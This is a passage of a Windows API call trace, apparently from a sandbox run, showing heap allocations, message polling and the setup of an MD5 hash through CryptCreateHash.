lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.895] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.896] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.896] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.896] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0263.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0263.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.897] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0263.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0263.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0263.898] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0263.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f28 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0263.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0263.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.905] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0263.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0263.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0263.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0263.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, 